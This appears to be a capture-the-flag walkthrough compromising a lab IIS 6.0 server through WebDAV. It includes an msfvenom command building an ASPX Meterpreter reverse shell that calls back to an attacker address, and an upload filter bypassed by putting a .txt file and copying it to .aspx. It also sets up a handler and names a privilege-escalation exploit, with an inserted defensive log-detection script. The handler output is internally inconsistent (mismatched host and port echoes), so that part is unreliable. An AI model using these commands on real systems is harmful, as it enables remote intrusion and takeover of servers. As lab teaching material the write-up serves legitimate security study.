```
Nmap scan report for 10.10.10.15
Host is up (0.064s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Date: Mon, 11 Sep 2023 13:12:46 GMT
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds
```
The nmap scan shows that WebDAV is enabled on the IIS 6.0 web server (note the allowed methods PUT, COPY and MOVE). To confirm that WebDAV is usable, we ran davtest against it:

```
davtest -url http://10.10.10.15
```

Reference:

Since WebDAV allows file uploads to the web root, we generate an ASPX Meterpreter reverse shell with msfvenom:

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.9 lport=1111 -f aspx -o shell.aspx
```

To upload the file we used cadaver:
```
$ cadaver 10.10.10.15:80
dav:/> put shell.aspx
Uploading shell.aspx to `/shell.aspx':
Progress: [=============================>] 100.0% of 2851 bytes failed:
403 Forbidden.
dav:/> put shell.txt
Uploading shell.txt to `/shell.txt':
Progress: [=============================>] 100.0% of 2851 bytes succeeded.
dav:/> copy shell.txt shell.aspx
Copying `/shell.txt' to `/shell.aspx':  succeeded.
```
The server rejects uploads with script extensions such as .aspx and .asp (the PUT of shell.aspx came back 403 Forbidden), so we renamed shell.aspx to shell.txt, uploaded that, and then restored the original extension on the server with cadaver's copy command. Now set up the payload handler:
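A defender-side check for the stage-then-rename pattern just described, added here as an example and not part of the original write-up. It assumes IIS 6's default W3C log fields and runs over constructed log lines that mirror the cadaver session; the `find_upload_rename` heuristic is an assumption of this example, not an IIS feature.

```python
# Added example: flag a WebDAV stage-then-rename upload in IIS W3C log lines.
# IIS 6's default W3C fields do not record the WebDAV Destination header, so the
# COPY/MOVE target is inferred from a later GET of a script file by the same
# client (a heuristic, assumed here).
from collections import defaultdict

SCRIPT_EXTS = (".asp", ".aspx")
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status"]

# Constructed sample log mirroring the cadaver session: PUT of .aspx denied,
# PUT of .txt accepted, COPY issued, then the .aspx is fetched.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2023-09-11 13:15:01 10.10.10.15 PUT /shell.aspx - 80 - 10.10.14.9 cadaver/0.23.3 403 1 0
2023-09-11 13:15:09 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.9 cadaver/0.23.3 201 0 0
2023-09-11 13:15:20 10.10.10.15 COPY /shell.txt - 80 - 10.10.14.9 cadaver/0.23.3 201 0 0
2023-09-11 13:15:41 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.9 Mozilla/5.0 200 0 0
2023-09-11 13:16:02 10.10.10.15 GET /index.htm - 80 - 10.10.14.7 Mozilla/5.0 200 0 0
"""

def parse(text):
    """Split W3C lines into dicts; '#' directive lines are skipped."""
    return [dict(zip(FIELDS, line.split())) for line in text.splitlines()
            if line and not line.startswith("#")]

def find_upload_rename(entries):
    """Return (client, staged_uri, script_uri) for each client that PUT a
    non-script file, then issued a successful COPY/MOVE, then fetched a
    script file, in log order."""
    per_client = defaultdict(list)
    for e in entries:
        per_client[e["c-ip"]].append(e)
    hits = []
    for client, events in per_client.items():
        staged, renamed = None, False
        for e in events:
            ok = e["sc-status"].startswith("2")
            uri = e["cs-uri-stem"].lower()
            if e["cs-method"] == "PUT" and ok and not uri.endswith(SCRIPT_EXTS):
                staged = uri
            elif e["cs-method"] in ("COPY", "MOVE") and ok and staged:
                renamed = True
            elif e["cs-method"] == "GET" and ok and renamed and uri.endswith(SCRIPT_EXTS):
                hits.append((client, staged, uri))
                staged, renamed = None, False
    return hits
```

Running `find_upload_rename(parse(SAMPLE_LOG))` on the sample returns one hit for 10.10.14.9; the 403 on the direct .aspx PUT followed by a successful PUT of another extension from the same client is itself worth alerting on.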
```
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost tun0
lhost => 192.168.1.123
msf exploit(handler) > set lport 1111
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 10.10.14.x:1111
[*] Starting the payload handler...
```
Since it is a Windows machine, I ran Metasploit's local exploit suggester directly from the Meterpreter session:

```
post/multi/recon/local_exploit_suggester
```

It suggested 8+ exploits, so I tried them one by one. The very first one gave us the root shell:

```
use windows/local/ms14_058_track_popup_menu
```
```
C:\>type "C:\Documents and Settings\Lakis\Desktop\user.txt"
xxxxxx...

C:\>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
xxxxxx...
```